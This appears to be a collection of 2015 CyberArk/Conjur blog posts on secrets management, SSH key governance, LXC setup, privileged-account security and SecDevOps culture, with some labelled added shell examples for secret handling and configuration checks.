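As an added example (not the Conjur CLI’s own implementation), here is the pattern behind that `!tmp` mapping written out as a plain shell function, so you can see exactly what the command being run gets to see. `fetch_secret` is a constructed stand-in for the secret store and returns a placeholder, not a real key; `with_tmp_secret` writes the secret to a mode-0600 temporary file, exports the chosen variable (CLIENT_PEM here) with the file’s path, runs the command, and removes the file whether or not the command succeeded. `check_pem_file` stands in for `knife cookbook upload` and only verifies what it was handed.

```shell
# Added example: the !tmp pattern as a shell function (not the Conjur CLI's
# own implementation). fetch_secret and the key it returns are constructed.

# fetch_secret ID: prints the secret for ID. Constructed stand-in for the
# secret store; a real deployment would call the store's CLI here.
fetch_secret() {
    case "$1" in
        hostedchef/conjurbot/private_key)
            printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' \
                          'constructed-placeholder-not-a-real-key' \
                          '-----END RSA PRIVATE KEY-----' ;;
        *) return 1 ;;
    esac
}

# with_tmp_secret VAR ID -- COMMAND [ARGS...]: run COMMAND with $VAR set to
# the path of a temporary file containing secret ID. The secret itself never
# appears in argv or in the environment, and the file is removed afterwards
# even when COMMAND fails.
with_tmp_secret() {
    local var=$1 id=$2 tmp rc
    shift 2
    [ "$1" = "--" ] && shift
    # GNU mktemp creates the file with mode 0600; the umask covers
    # implementations that honour the umask instead.
    tmp=$(umask 077 && mktemp) || return 1
    if ! fetch_secret "$id" > "$tmp"; then
        rm -f "$tmp"
        echo "with_tmp_secret: no secret named $id" >&2
        return 1
    fi
    # Export only the path, in a subshell so the caller's environment is
    # untouched; shell functions as well as binaries can be the command.
    ( export "$var=$tmp"; "$@" )
    rc=$?
    rm -f "$tmp"
    return $rc
}

# check_pem_file: stand-in for `knife cookbook upload .`. Succeeds only if
# CLIENT_PEM names a key file that is exactly mode 0600, and prints the path
# so the caller can confirm it was removed afterwards.
check_pem_file() {
    [ -f "$CLIENT_PEM" ] || return 1
    grep -q 'BEGIN RSA PRIVATE KEY' "$CLIENT_PEM" || return 1
    find "$CLIENT_PEM" -perm 600 | grep -q . || return 1
    printf '%s\n' "$CLIENT_PEM"
}

# demo_run: returns 0 only if the command saw a correct 0600 key file and
# that file no longer exists once with_tmp_secret has returned.
demo_run() {
    local path
    path=$(with_tmp_secret CLIENT_PEM hostedchef/conjurbot/private_key -- check_pem_file) || return 1
    [ -n "$path" ] && [ ! -e "$path" ]
}

demo_run && echo "secret was supplied via a 0600 temp file and cleaned up"
```

The important properties are the ones the demo checks: the command sees a file only it (and root) can read, the key is never an argument or an environment value where `ps` or a crash dump could expose it, and the file is gone as soon as the command exits, including on failure. In a real script the call would be `with_tmp_secret CLIENT_PEM hostedchef/conjurbot/private_key -- knife cookbook upload .`.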

[screenshot: the build layer granted execute permission on hostedchef/conjurbot/private_key]

In a production scenario you would give read permission on this key to only the parts of the infrastructure that need it – your CI/deploy system.

Check out `.conjurenv`, `knife.rb` and `deploy.sh` here: https://github.com/conjurdemos/chefconf15-base

 

Conjur 4.4 Released https://www.cyberark.com/blog/conjur-4-4-released/ Thu, 12 Mar 2015 13:00:00 +0000

On March 5th, 2015 we released Conjur 4.4!  This replaces version 4.3.2 from November 2014.  There are a number of improvements and added features.  Please read on for more details.

Top-level overview of new features:

  1. Improved security: Stronger encryption and tamper-proofing of secrets at rest. A third-party cryptographic audit report is available on request.

  2. Support for secondary groups in Conjur LDAP: Facilitates granular SSH access management via custom sudoers, as well as expanded possibilities for searching Conjur LDAP.

  3. Simplified and extended HA server management: The new “evoke” tool provides unified server configuration for Conjur HA management, including:

    • Configuration of a VM or bare-metal server into different roles (as a standalone appliance, or as any component of an HA architecture)

    • Replication-based, no-downtime upgrade of HA deployments

    • Generation of seed files, which are used to establish trust and connection between the various servers in an HA setup

    • Server backup and restore

    • Re-issue of SSL certificates with new altnames

  4. Conjur Audit Server: This new server capability provides export of audit records to external data stores such as Amazon RDS, ElasticSearch, Splunk, SumoLogic, etc.

    • Available as a Docker image

  5. LDAP synchronization: Conjur users and groups can be synchronized from an upstream LDAP or ActiveDirectory server.

    • Synchronization is one-way, from the LDAP to Conjur.

    • Specific upstream groups can be selected for synchronization.

    • uid and gid numbers are synchronized from the upstream system into Conjur.

    • Enables “blended” group management combining the external directory (e.g. ActiveDirectory) and native Conjur groups.

  6. Audit improvements:

    • Better audit of forbidden actions

    • Support for audit limits to cap the storage needs of Conjur servers

  7. New appliance platforms:

    • Conjur is now available as an LXC container. Lightweight, fast and easy to set up!

    • Conjur in VirtualBox is available for use as a development sandbox.

  8. Permissions directory: Full role graph data can be efficiently retrieved, with full support for permissions rules and visibility.

If you’d like to see how these new features work in your own environment, please sign up for a free 30 day trial or contact us and we’ll answer any questions you may have.

 

The Access Control Gap in IaaS https://www.cyberark.com/blog/the-access-control-gap-in-iaas/ Wed, 11 Mar 2015 17:07:00 +0000

Agile control plane and system administration security is the missing link in enterprise IaaS.

It still seems like cloud adoption is driven by startups and non-sensitive data. Security and compliance concerns, along with inertia and turf-defense, are holding enterprises back from the cloud.

In this post, we posit that the remaining concerns that are holding sensitive workloads back from the cloud are rooted in the Systems Administration and Control Plane tiers. The nature of these systems is quite different from the traditional, on-premise data center.

Zero-trust systems, infrastructure as code, DevOps, and continuous delivery all present access control challenges that are not well-addressed by the last generation of access control and secrets management systems. Conjur exists to meet this need in a way that fits the needs and workflows of business, compliance, security, operations, and development.

Consider the basic elements of a typical IAAS-driven security stack:

At the top is the firewall, which may be a simple proxy server, or a more advanced piece of technology like a web application firewall. This is a pretty well understood problem; good solutions are available for both on-premise and IAAS.

Behind the firewall is the application tier, providing end user authentication and authorization via code that’s built into the app. It may also leverage some external providers like Active Directory or SAML. Most of the application-level security is built into the application code, which is the same whether it’s deployed on-premise or in IAAS. Extending the backend auth provider to the cloud has some challenges (especially for AD), but there are established companies today which provide LDAP services in cloud, including the Amazon Web Services Directory Service.

Whether on-premise or cloud, applications run on physical servers or virtual machines. Access to these machines is a back-door to all the application data and security controls. Therefore, the “gates” which control machine access, including secrets like database passwords as well as gatekeeper systems like SSH, are critically important for security purposes. The management of secrets in a cloud + DevOps environment is a problem without an established solution; Conjur provides robust, programmable secrets management that supports developer, ops, security, and combined (SecDevOps) workflows.

In IAAS systems, machines and other resources like queues and databases are increasingly managed not by human admins, but by trusted services running in a “control plane” that sits below the level of applications. For examples of control plane services think of Netflix Asgard auto-scaling and deployment service or configuration management tools like Chef, Puppet, Ansible, and SaltStack. In Continuous Delivery scenarios in which code is automatically packaged, tested, and deployed, the control plane even extends to systems like Jenkins and Github. Proper management of the control plane is a big challenge in the cloud. Conjur’s secrets management and LDAPS and HTTPS authorization APIs can be used very effectively in the control plane. For an example, see our now-classic blog post on Conjur and Jenkins.

Beneath the control plane sits the internal network. This network encompasses all of the VPNs, security groups, VPCs, subnets, NATs, routers etc. that govern the flow of traffic in the system. IaaS has greatly expanded the possibilities for network topologies; however, best practices are still evolving.

Finally, beneath the network sits the physical infrastructure. Whether on-premise or IAAS, if you look far enough down the stack, everything is housed in a physical facility. The physical security of hosted IAAS systems is undeniably better than just about any on-premise facility. One could say that in IAAS, the physical security of data centers is a solved problem.

After looking at the areas described above, we at Conjur feel that the security aspects of Firewall, Application authn / authz, Networking, and Physical Infrastructure are well-understood and well-addressed in cloud. The next missing piece is access control for the cloud control plane that works with the cloud.

If you would like to find out more, please contact us.

What the NIST Guidelines for Secure Shell Mean for Your Organization https://www.cyberark.com/blog/nist-guidelines-secure-shell-mean-organization/ Thu, 05 Mar 2015 20:43:51 +0000

The National Institute of Standards and Technology (NIST) recently issued guidelines for the use of Secure Shell (SSH) in automated access management. Frequently used by system administrators, SSH is a protocol used to enable secure access of privileged accounts to remote systems.

While the SSH protocol itself provides a secure communications channel, unmanaged SSH keys can introduce several vulnerabilities into an otherwise secure system. According to a recent report by the Ponemon Institute, the majority of organizations today are neither securing nor managing SSH keys. Worse, as a result, fifty-one percent of organizations surveyed in the report have already experienced an SSH key-related compromise.

NIST encourages organizations to start treating SSH keys like the privileged credentials they truly are by focusing on the following control areas:

  • Account Management – Proactively secure, manage and monitor the use of SSH keys.
  • Access Enforcement – Create and enforce approval policies for SSH key-based access to all enterprise systems, whether they are servers, virtual machines, operating systems, databases or applications.
  • Least Privilege – Limit privileges and access rights only to those required for a user’s role or function.
  • Auditing and Monitoring – Track the use of SSH keys, including who used the private key and what target system was accessed with that key.
  • Risk Assessment – Assess your environments, look for unnecessary relationships between systems and take steps to better segregate your environment.
  • Identity and Authentication – Ensure that each user has a unique SSH key and that the SSH key cannot be shared with other users, in order to easily identify who is doing what.

By following these guidelines, organizations can bring SSH key security and management into their broader security plans, getting a head start on becoming compliant, mitigating the risk of unauthorized access to critical systems and better securing their sensitive data.
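As an added example (not from the post, and not CyberArk code), here is a small check for the Identity and Authentication and Risk Assessment items above: it reads authorized_keys lines prefixed with the account name, reports any public key that is installed under more than one account (a shared key, which defeats attribution) and any key carrying no comment to identify its owner. The sample input is constructed; on a real host you would assemble it from each account’s ~/.ssh/authorized_keys.

```shell
# Added example, not from the original post. Input is one line per key:
#   <account> <keytype> <base64-key> [comment]
# built from each account's authorized_keys file; the sample is constructed.

# find_shared_keys: prints "<keytype> <key prefix>... <account,account,...>"
# for every key present under more than one account. Returns 1 if any were
# found, 0 otherwise, so it can be used as a check in a script.
find_shared_keys() {
    awk '
        $2 ~ /^(ssh-|ecdsa-|sk-)/ && NF >= 3 {
            key = $2 " " $3                     # the key material is the identity
            if (!(key in accounts)) {
                accounts[key] = $1
                order[++n] = key                # remember first-seen order
            } else if (index("," accounts[key] ",", "," $1 ",") == 0) {
                accounts[key] = accounts[key] "," $1
            }
        }
        END {
            rc = 0
            for (i = 1; i <= n; i++) {
                k = order[i]
                if (index(accounts[k], ",") > 0) {
                    print substr(k, 1, 24) "... " accounts[k]
                    rc = 1
                }
            }
            exit rc
        }'
}

# find_unlabelled_keys: prints "<account> <keytype>" for keys with no comment;
# a key nobody can attribute cannot be tied to a person or safely rotated.
find_unlabelled_keys() {
    awk '$2 ~ /^(ssh-|ecdsa-|sk-)/ && NF == 3 { print $1, $2 }'
}

# Constructed sample: alice and bob share one key, carol's key has no comment.
SAMPLE_AUTHORIZED_KEYS='alice ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedKeyAlice alice@laptop
bob ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedKeyAlice alice@laptop
bob ssh-rsa AAAAB3NzaC1yc2EAAAADAQABConstructedKeyBob bob@desk
carol ssh-rsa AAAAB3NzaC1yc2EAAAADAQABConstructedKeyCarol'

shared_key_report()     { printf '%s\n' "$SAMPLE_AUTHORIZED_KEYS" | find_shared_keys; }
unlabelled_key_report() { printf '%s\n' "$SAMPLE_AUTHORIZED_KEYS" | find_unlabelled_keys; }

shared_key_report || echo "shared keys found (see above)"
unlabelled_key_report
```

A shared key is the case the guidelines single out: once two people can authenticate as the same principal, the audit trail can no longer say who used the key, and revoking it for one person breaks it for the other. Keys with no comment are the first candidates for the risk-assessment inventory, since nobody can say which person or job they belong to.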

Read this CyberArk white paper to find out more about what the NIST guidelines for SSH mean for your organization and how CyberArk solutions can help organizations implement these security controls.

Getting started with LXC https://www.cyberark.com/blog/getting-started-with-lxc/ Thu, 05 Mar 2015 20:00:00 +0000

LXC is a unified management toolkit that allows you to run multiple isolated instances of Linux (containers) on a single computer.

LXC is related to, but different from, virtualization engines like Xen and KVM. Unlike full-fledged virtual machines, LXC containers share one OS kernel. However, the processes that are running in one of the containers are completely isolated from processes running in another container. This isolation is achieved through the use of Linux kernel features such as:

  • cgroups limit, account for and isolate the resource usage (CPU, memory, disk I/O, network) of groups of processes. LXC creates a cgroup for each container, so you can control every container’s resources independently.

  • namespaces isolate kernel resources (ipc, uts, mount, pid, network, user), making sure that each container cannot “see” or affect other containers. From the user’s viewpoint, the init process in each container has PID 1 and the ifconfig command shows only that container’s network interfaces.

  • capabilities provide fine-grained control over superuser permissions, so that using the root user to launch applications can be avoided.

  • AppArmor and SELinux extend the traditional Unix discretionary access control (DAC) model with a mandatory access control (MAC) model, mainly used to protect the host system against the software running in containers. For example, they control which devices and which kernel features are accessible from a container.

  • seccomp provides a very low-level sandbox mechanism for applications: it allows a process to make a one-way transition into a “secure” state where it cannot make any system calls except a few for reading and writing already-open files. In recent kernels it also allows selecting which syscalls are permitted.

It’s alright if you don’t know much about these kernel features. LXC provides a user-friendly way to take advantage of all of them, with sensible defaults, without sacrificing low-level control if you actually need it.

Another cousin of LXC is Docker. While Docker started as a layer on top of LXC, it’s now built on its own container engine called libcontainer. A good way to understand how Docker differs from LXC is to understand the concept of a 12-factor application. 12-factor applications are composed of disposable, stateless processes, and it happens that this is exactly what Docker provides. A Docker container is designed to run a single process only, rather than a fully fledged machine like full virtualization or LXC. A Docker container must have fully externalized configuration (especially for secrets), and it’s also designed to share data with the host environment through linked volumes.

So, think of it this way: LXC containers are lightweight VMs. You can install your OS, log in, install applications and services, and it will work as expected. It will have a proper init process, running services and daemons, etc.

Intrigued? Let’s show how to get started.

Installation

Modern distributions such as Ubuntu Trusty (14.04), Utopic (14.10) or later and Debian Jessie ship packages of the stable LXC 1.x release. In these distros you can install LXC directly from the repository and start using it. For OS X users: LXC, like Docker, will not run natively, since it uses technologies implemented only in the Linux kernel, so you have to run a modern Linux distribution inside a full-weight virtual machine such as VirtualBox. Of course, this is also an option for users of other platforms.

We use Ubuntu Trusty as our workstation and server operating system. It’s working great for us, so we recommend that you use it too!

Ubuntu

Trusty or Utopic users can just install packages from the repository:

$ sudo apt-get install lxc

If you are using an older distribution, or you want to use a newer version of LXC on a fresh distro, then you have a choice of two PPAs (ppa:ubuntu-lxc/stable and ppa:ubuntu-lxc/daily):

Adding a PPA and installing packages from it is always simple:

$ sudo apt-get install -y python-software-properties
$ sudo add-apt-repository -y ppa:ubuntu-lxc/stable # or ppa:ubuntu-lxc/daily for those who have strong spirit
$ sudo apt-get update
$ sudo apt-get install -y lxc

The brctl program is in the bridge-utils package. debootstrap, rpm, yum and pacman are contained in the packages of the same names.

OS X

You can use VirtualBox (https://www.virtualbox.org/wiki/Downloads) to run Ubuntu Utopic (it’s free!). Just download the installation image from http://releases.ubuntu.com/14.04/ubuntu-14.04.1-server-amd64.iso and install it inside a VirtualBox virtual machine.

If you are a Vagrant user, just copy the listing below into a new Vagrantfile and run in a terminal:

$ vagrant up

Listing: Vagrantfile

VAGRANTFILE_API_VERSION = "2"
Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
  # Ubuntu Utopic (14.10) base box
  config.vm.box = "utopic64"
  config.vm.box_url = "http://files.vagrantup.com/utopic64.box"
  # install LXC and brctl (bridge-utils) on first boot
  config.vm.provision :shell, :inline => "apt-get update -qq && apt-get install -yqq lxc bridge-utils"
  # host-only address for reaching the VM, plus a bridged interface
  config.vm.network :private_network, ip: "10.0.4.2"
  config.vm.network :public_network
end

A few minutes later, you can execute this command to get inside a fully configured system with installed LXC:

$ vagrant ssh

After installation

Run lxc-checkconfig to make sure that everything works as it should. Every item should read “enabled” (shown in green):

$ sudo lxc-checkconfig
Kernel configuration not found at /proc/config.gz; searching...
Kernel configuration found at /boot/config-3.19.0-031900rc6-generic
--- Namespaces ---
Namespaces: enabled
Utsname namespace: enabled
Ipc namespace: enabled
Pid namespace: enabled
User namespace: enabled
Network namespace: enabled
Multiple /dev/pts instances: enabled

--- Control groups ---
Cgroup: enabled
Cgroup clone_children flag: enabled
Cgroup device: enabled
Cgroup sched: enabled
Cgroup cpu account: enabled
Cgroup memory controller: enabled
Cgroup cpuset: enabled

--- Misc ---
Veth pair device: enabled
Macvlan: enabled
Vlan: enabled
File capabilities: enabled

Note : Before booting a new kernel, you can check its configuration
usage : CONFIG=/path/to/config /usr/bin/lxc-checkconfig
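As an added example (not from the post, nor from LXC’s own tooling), here is a small filter over lxc-checkconfig output that prints any feature whose status is not “enabled” and fails if there is one, so the check can go into a provisioning script instead of being eyeballed for green text. It runs here against a constructed sample of the output, with User namespace deliberately set to “missing” (which is what would stop unprivileged containers from working); on a real host pipe `sudo lxc-checkconfig` into it.

```shell
# Added example, not from the original post or from LXC. Reads
# lxc-checkconfig-style output on stdin; the sample below is constructed.

# check_lxc_config: prints every "Feature: status" line whose status is not
# "enabled" and returns 1 if there was any, 0 if everything is enabled.
check_lxc_config() {
    local status=0 line name value
    while IFS= read -r line; do
        # Skip section headers, the kernel-config lines, the trailing note,
        # the usage hint and blank lines.
        case "$line" in
            ---*|Kernel*|Note*|usage*|"") continue ;;
        esac
        name=${line%%:*}
        value=${line#*:}
        value=${value# }          # drop the single space after the colon
        case "$value" in
            enabled*) ;;          # "enabled" and "enabled, not loaded" both pass
            *) printf '%s: %s\n' "$name" "$value"; status=1 ;;
        esac
    done
    return "$status"
}

# Constructed sample output with one feature deliberately not enabled.
SAMPLE_CHECKCONFIG='Kernel configuration found at /boot/config-constructed
--- Namespaces ---
Namespaces: enabled
Utsname namespace: enabled
User namespace: missing
Network namespace: enabled
--- Control groups ---
Cgroup: enabled
Cgroup memory controller: enabled
--- Misc ---
Veth pair device: enabled
File capabilities: enabled
Note : Before booting a new kernel, you can check its configuration
usage : CONFIG=/path/to/config /usr/bin/lxc-checkconfig'

# lxc_config_report: runs the check over the constructed sample.
lxc_config_report() {
    printf '%s\n' "$SAMPLE_CHECKCONFIG" | check_lxc_config
}

if lxc_config_report; then
    echo "all LXC kernel features enabled"
else
    echo "some LXC kernel features are not enabled; fix the kernel config before creating containers"
fi
```

Because the function returns non-zero on any problem, `sudo lxc-checkconfig | check_lxc_config || exit 1` is enough to make a build script stop before it tries to create containers on a kernel that cannot isolate them properly.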

The system will also have a new network interface, lxcbr0: a bridge that all containers attach to, like a physical switch, and that routes their traffic out to the Internet:

$ sudo ifconfig | grep lxc
lxcbr0    Link encap:Ethernet  HWaddr e2:0a:c8:95:d0:b3

Have questions about this?  Feel free to leave a comment below and I will respond in the thread.  Stay tuned for my next blog post that will further examine LXC and provide an example.

3 Insider Tips to Maximize Your ChefConf 2015 Experience https://www.cyberark.com/blog/3-insider-tips-to-maximize-your-chefconf-2015-experience/ Tue, 24 Feb 2015 16:00:00 +0000

As we inch closer to March, our thoughts are starting to drift out of the snowbanks of Boston and float towards the much sunnier skies of Santa Clara where we will be attending ChefConf from March 31st to April 2nd.  For those not familiar with the event, it is put on by Chef who succinctly describes it as:

“The largest, most vibrant gathering of web-scale IT and DevOps leaders, practitioners, and innovators. Featuring three days of inspired discussions, collaborative presentations, technical training, and hands-on labs focused on automating infrastructure and the continuous delivery of applications.”

As first-time attendees (and sponsors), we wanted to learn how to maximize our week at the conference from a ChefConf veteran. Luckily, the folks at Chef were nice enough to put us in touch with Nathen Harvey, Chef Community Director, who was able to answer some of our questions.

If you are attending, or are thinking about attending, we are sure you’ll find Nathen’s answers helpful and we hope to see you there!

Q1) What will be the biggest difference between this year’s ChefConf and last year’s conference?

A1) The big difference will be the scale of the event. We’ve outgrown our previous location and we’re in the much bigger Santa Clara Convention Center. This will be the largest ChefConf in the history of Chef. We’ll have stalwarts of the Chef community; a large number of new and growing customers (Bloomberg, Workday, CenturyLink) are speaking this year; and many new customers as the Chef tent grows. Additionally, the Chef partner ecosystem is exploding as DevOps becomes more mainstream, and our technical partnerships, like the one with Conjur, bring customers more value out of their automation projects.

Q2) What are 1 or 2 sessions that you are most excited about this year and why?

A2) We have a really great slate of talks, but a couple of sessions I’m particularly excited about are both from first time speakers:

  • Christine Draper and John Sweitzer of Thirdwave Insights will speak in a session titled Serve meals, Not Ingredients in which they will share techniques for deployment topologies.

Q3) What advice would you give to someone attending ChefConf for the very first time this year?

A3) Come with an open mind and plan to get your hands dirty. ChefConf is not your typical technical conference. The Chef Community is welcoming and open-minded to all sorts of ideas, people, and approaches, and as a first timer, embrace and engage with other attendees. Networking and learning from other community members is highly encouraged!

Many thanks to Nathen for providing such great feedback.  If you are planning on attending ChefConf (seriously, why wouldn’t you at this point?) then we’d like to make sure you know that Kevin and Dustin from Conjur, along with a special guest speaker, will be presenting a half-day workshop on Building a Self-Documenting Application: A Study in Chef and Compliance.  If this is something that interests you, please stop by and say hello!

We look forward to seeing you next month at ChefConf!


]]>
Carbanak, Anunak and Unprotected Privileged Accounts https://www.cyberark.com/blog/carbanak-anunak-unprotected-privileged-accounts/ Mon, 23 Feb 2015 18:30:33 +0000 https://www.cyberark.com/blog//

The financial world and the security industry have been rocked by the recent report from Kaspersky about the cyber-criminals that have stolen more than $1 Billion from global banks through cyber attacks. The initial reports link the attacks to a multinational criminal group, and highlight the use of sophisticated malware, dubbed Carbanak.

The attackers used simple techniques like phishing to trick employees into infecting their endpoints with malware. Once installed, the attackers went after the administrators in order to gain access to the machines on which financial administrators operated. On these machines, the attackers studied employee behaviors, captured keystrokes and passwords, and mimicked the banking procedures to ultimately steal money through fraudulent transactions and cash discharges at ATMs.

If this sounds familiar, it’s because these attacks seem to be closely related and probably are the same as the attacks disclosed in a December 2014 report by Fox-IT and Group-IB. We blogged about the emergence of the group at the time, and how the group targeted and exploited privileged accounts to perpetrate their attacks.

Regardless of what the group or malware is called, the recent revelations of hundreds of millions of dollars in cybercrime targeting the financial industry shows that criminal enterprises are alive and well, and continue to cultivate new cyber capabilities.

Protecting against these threats requires a shift in our mindset about cyber security – protecting your organization starts with the understanding that if your network holds something of value for a targeted attacker, then you’re likely breached right now, or have been breached recently. This understanding is based on the fact that motivated attackers will always find a way in past perimeter defenses, mainly because they have limitless attempts to try and break through, and because they can test their attack tools against any existing perimeter defense.

Once inside, attackers immediately focus on hijacking and exploiting unprotected privileged accounts (such as those of systems administrators), enabling them to move laterally across the network, gain access to critical systems, operate on sensitive assets and exfiltrate stolen data.

According to CyberArk’s recently published Cyber Threat Report, over 80 percent of all serious security incidents included a compromise and misuse of privileged accounts at some point in the attack process.

If the Carbanak and Anunak attacks teach us anything, it’s that while cyber attackers may have different motives or end goals, their pathways are usually the same: commandeer privileged accounts, escalate privileges to gain access across the network and steal critical data and assets without detection. This privileged escalation cycle is something we see time and time again, and organizations need to be prepared to prevent it and mitigate the threat of targeted attacks.

By implementing the necessary tools and infrastructure to manage, continuously monitor and track privileged account activity, along with the analytics and intelligence to identify anomalous activity, organizations can protect themselves and enable a quick detection and response, making it possible to mitigate potential damage early in the attack cycle.

Learn more about privileged account exploits and read first-hand accounts from some of the world’s top cyber forensics and incident response professionals in our Cyber Threat Report.

]]>
Understanding Linux Security https://www.cyberark.com/blog/understanding-linux-security/ Fri, 20 Feb 2015 18:55:17 +0000 https://www.cyberark.com/blog//

Over the years, it has been interesting to watch the rise of Linux servers as the go-to operating system for organizations. They’re touted for their superior stability, security, hardware, affordable cost of ownership and more. A recent IDC report found that Linux server demand has continued to grow with increased cloud infrastructure deployments and that they now represent 28.5 percent of all server revenue.

But popularity aside, Linux servers are not without flaws and can still be compromised, and the complexities of Unix environments, including customization and integration of script-based operations, can make security problems even more challenging. One recent example of its susceptibility was the critical vulnerability found in glibc, the GNU C library, which allowed attackers to execute code, gain access to user permissions, and remotely gain control of Linux machines. While patched, the so-called “GHOST” vulnerability raises the question of how organizations can prevent exploitation of similar Linux issues. Beyond the glibc vulnerability, we all remember the Shellshock bug that was uncovered late last year, which affected all UNIX-based operating systems and Apple’s OS X and is still a big issue for the Linux community.

So how can organizations implement the necessary precautions to ensure their Linux servers don’t become a pathway for attackers to compromise and exfiltrate critical data? One important step is to follow the least privilege principle, which gives users no more access than is necessary for them to do their jobs.

This also means granting privileges strictly for current needs – not future ones – and continuously reviewing existing privileges to revoke those that are no longer required. The biggest challenge organizations and IT managers face today with regards to their super-user and administrator accounts is understanding who is accessing business-critical systems and information, and when they are accessing them. And that’s not to mention ever-increasing compliance regulations, which require stringent control over privileged accounts to prevent exposure of sensitive information to unauthorized users.

CyberArk takes the burden off of your organization, allowing you to easily combat Linux security issues while effectively balancing security and compliance requirements with operational and end-user needs. CyberArk On-Demand Privileges Manager allows for enterprise-ready, centralized management and enables you to control and monitor administrative rights on desktops and servers, protecting both Unix/Linux and Windows environments. With CyberArk On-Demand Privileges Manager, user access can be determined and run based on the role and task at hand, dramatically reducing the exploitation of privileged accounts and overall risk within an enterprise.

As Linux servers continue to be relied on as the OS for the enterprise, it’s important to implement a solution to protect against security issues that are bound to arise. To help do so, we encourage you to check out our white paper, The 10 Pains of Unix Security.  And to learn more about our On-Demand Privileges Manager solution or to speak with a security specialist, visit here.

]]>
SecDevOps: Can there be happiness in security work? https://www.cyberark.com/blog/secdevops-can-there-be-happiness-in-security-work/ Thu, 19 Feb 2015 14:07:00 +0000 https://cyberarkvx2.wpengine.com/blog/secdevops-can-there-be-happiness-in-security-work/  

Stress and burnout are a very real concern in the InfoSec community. We talk about it at conferences, on podcasts, on Twitter, and on our blogs. There are even support groups and projects dedicated to the burnout in the security industry. I won’t go into the many studies and statistics on the issue, they are readily available elsewhere. Rather, I’d like to talk about this problem as it relates to the SecDevOps movement, where we have security teams engaged with dev and ops teams, in some cases as an embedded asset on a cross-functional team.

Metrics matter: data-driven decisions are a key part of the DevOps movement (the M in CAMS). For a couple of years now I’ve been collecting a ‘happiness’ data point during our sprint retrospectives. On a scale of 1-5, how happy were you with how the past sprint has gone, how happy are you working here? This is a subjective and emotional metric, not tied to units of work produced or business goals. The team is cross-functional with sec/dev/ops all working together, and the team score is an average of everyone’s individual score. Here’s the graph from 2014; sprints were 1 week long:

Pretty content, for the most part. There were two factors that made the team report as less happy: lots of security work in the sprint and unclear business requirements. The latter can have many causes: unclear market, poor communication, and so on. Let’s focus on the former – why does increased security work in a sprint make a team unhappy?

#1: Low incentives and rewards

Security is seen as a cost center in many organizations, something you have to write a check for to avoid a potential disaster. Often, security is built into a product just before launch. Deadlines are looming, corners are cut and it is hard to be certain when enough is enough. Security is seen as a liability, not a feature, and stakeholders are not invested in the progress of the work being done.

Let’s compare the reactions of stakeholders during end-of-sprint demos.

A new product feature

A new security feature


Security work is not usually visual; running through a series of CLI commands during a demo is not likely to inspire. I’m not saying we have to have a GUI for everything. But security work must be a first-class citizen. We have to reframe the conversation if we want others to participate.

#2: Security slows down development

There is a line between being thoughtful about security and being a drag on velocity. Without cross-functional collaboration this line is easy to cross without knowing it. As Ops is coming to be seen as a service by providing platforms and reliability, Security should also be viewed as a service. If developers are being blocked by waiting on credentials, if ops are being blocked by waiting on security topology changes – this is a broken service. Tools like Conjur can help. Ultimately, though, our security processes need to be regularly evaluated by all teams affected by them. Not giving dev and ops a voice leads to them being less invested. Less investment means a broken process that is worked around.

#3. The blame culture

Someone hacked into our Postgres, who let this happen? Someone rotated an API key and our services went down, who is to blame? The root cause of security problems is too often seen as a person and not a process. It is easier to point out the troublemaker than to take a good look at our security process and see what went wrong. A dev puts the PostgreSQL password into their source code because no one has yet figured out how to run tests with credentials in CI. Ops doesn’t lock down the RabbitMQ management console because they’ve been waiting on passwords to be made available to them all sprint. These types of problems are the symptoms of broken processes. The results of a postmortem should be action items to improve how we work together, not a demotion or public shaming of an individual. Accountability is necessary, but we do ourselves a disservice by focusing more on blaming than improving.

Taking the time to address these issues is more important when transitioning to SecDevOps, not less. Security, development and operations share pain points. The cultural and organizational issues that security has been struggling with are now out in the open and impacting the other teams that they work with more closely. Working together to improve communication and workflows is key to the success of SecDevOps. Let’s put a priority on happiness.

]]>
NOTICE: Investigators Warn of Increase in Service Account Exploits https://www.cyberark.com/blog/notice-investigators-warn-increase-service-account-exploits/ Tue, 10 Feb 2015 19:27:18 +0000 https://www.cyberark.com/blog//

“Most companies expect service accounts to be used only internally, so they keep the default passwords…[but] many of our recent investigations have seen exploits in service accounts – probably in 80-90 percent of the cases.” – Christopher Novak, Verizon RISK Team, Verizon Enterprise Solutions

Our recent threat research report analyzes the forensic experiences of the world’s leading cyber threat investigators in remediating the most devastating breaches. The report identifies the commonalities across advanced attacks, enabling organizations to better understand their adversaries so they can build more effective defenses against the latest threats.

In our last blog post, we looked more in-depth at one of the six primary findings in the report, the fact that no industry is safe from attackers. Today, we’re looking at the increasing attacker sophistication related to service accounts.

To read the report for yourself, download it here for free.

Finding #6: Exploits of privileged accounts widen

Privileged accounts are found across the enterprise and are prevalent in even the most unassuming places. In fact, when securing your organization’s privileged accounts, it’s important to remember that privileged accounts ship with every piece of information technology, including servers, desktops, applications, databases and network devices.

In the report, experts highlight that attackers increasingly are targeting service accounts. These accounts range from embedded devices in the Internet of Things, to multiple privileged identities used in Microsoft Active Directory to ensure redundant points of access. The increasing sophistication around targeting service accounts points to the fact that hackers are no longer simply aimed at exfiltrating data; their goal is to gain widespread control of entire IT infrastructures.

Christopher Novak of Verizon went on to say, “We’ve seen 25-30 attacks recently in which attackers used (publicly available) default passwords… And because it’s presumed individuals aren’t using [these accounts], analysts dial down the sensitivity on alerts. Service accounts are out of sight, out of mind.”

What this means is that while you may have some level of privileged account activity monitoring and security, there is likely an entire portion of your IT infrastructure that remains unprotected and open to attack. Beyond that, if attackers get access to an unmanaged service account, they can more easily navigate throughout the network with low risk of discovery.

When it comes to monitoring, protecting and securing privileged accounts, organizations need to do their due diligence to identify every account that exists, as well as do regular sweeps of new accounts as IT networks continue to expand with the ever-growing list of non-traditional types of Internet-connected devices. The bottom line is: if you can’t account for all of the privileged credentials across your organization, then you can’t expect to be secure. To find out where to start solving your privileged account challenges, check out our best practices guide.

]]>
Infrastructure as Code – Don’t Let Security Slow You Down https://www.cyberark.com/blog/infrastructure-as-code-dont-let-security-slow-you-down/ Fri, 06 Feb 2015 16:49:00 +0000 https://cyberarkvx2.wpengine.com/blog/infrastructure-as-code-dont-let-security-slow-you-down/  

A particularly thorny problem many developers face when writing configuration management code is how to use different secrets to test against various parts of their infrastructure. For best results, obtaining secrets should be the same no matter which environment you are in: local, test, dev or prod.

